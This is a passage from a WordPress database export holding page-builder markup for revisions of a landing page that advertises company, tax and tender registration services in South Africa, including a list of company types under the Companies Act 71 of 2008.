animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>\n[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row _builder_version=\"3.26.6\" column_structure=\"2_3,1_3\"][et_pb_column _builder_version=\"3.26.6\" type=\"2_3\"][et_pb_shop _builder_version=\"3.26.6\" type=\"product_category\" include_categories=\"8,7,17\" posts_number=\"4\"][/et_pb_shop][/et_pb_column][et_pb_column _builder_version=\"3.26.6\" type=\"1_3\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 11:40:57','2019-08-15 09:40:57','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32781,3,'2019-08-15 11:47:26','2019-08-15 09:47:26','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" 